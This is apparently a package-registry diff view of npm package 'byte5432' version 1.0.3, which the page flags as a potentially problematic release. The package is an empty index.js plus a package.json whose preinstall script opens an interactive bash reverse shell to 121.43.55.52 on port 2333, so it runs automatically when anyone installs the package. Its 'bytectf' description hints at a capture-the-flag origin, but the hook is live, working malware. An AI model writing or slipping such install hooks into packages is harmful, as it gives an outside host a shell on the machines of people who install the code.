byte5432 1.0.3
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of byte5432 might be problematic. Click here for more details.
- package/index.js +0 -0
- package/package.json +16 -0
package/index.js
ADDED
File without changes
|
package/package.json
ADDED
@@ -0,0 +1,16 @@
|
|
1
|
+
{
|
2
|
+
"name": "byte5432",
|
3
|
+
"version": "1.0.3",
|
4
|
+
"description": "bytectf",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "bash -c 'bash -i >& /dev/tcp/121.43.55.52/2333 0>&1'",
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
9
|
+
},
|
10
|
+
"keywords": [
|
11
|
+
"ctf"
|
12
|
+
],
|
13
|
+
"author": "pysnow",
|
14
|
+
"license": "ISC",
|
15
|
+
"dependencies": {}
|
16
|
+
}
|